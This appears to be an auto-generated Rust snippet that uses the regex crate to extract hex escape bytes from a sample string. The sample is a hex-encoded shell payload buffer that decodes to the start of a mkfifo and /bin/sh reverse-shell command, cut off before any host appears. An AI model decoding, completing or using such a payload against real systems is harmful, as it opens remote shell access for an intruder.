// include the latest version of the regex crate in your Cargo.toml
extern crate regex;
use regex::Regex;
fn main() {
let regex = Regex::new(r"(?m)\\x([\w|\d]{2})").unwrap();
let string = "buf += b\"\\x6d\\x6b\\x66\\x69\\x66\\x6f\\x20\\x2f\\x74\\x6d\\x70\\x2f\\x73\"
buf += b\"\\x35\\x35\\x20\\x30\\x3c\\x2f\\x74\\x6d\\x70\\x2f\\x73\\x61\\x6b\"
buf += b\"\\x6e\\x20\\x7c\\x20\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x20\\x3e\"
";
// result will be an iterator over tuples containing the start and end indices for each match in the string
let result = regex.captures_iter(string);
for mat in result {
println!("{:?}", mat);
}
}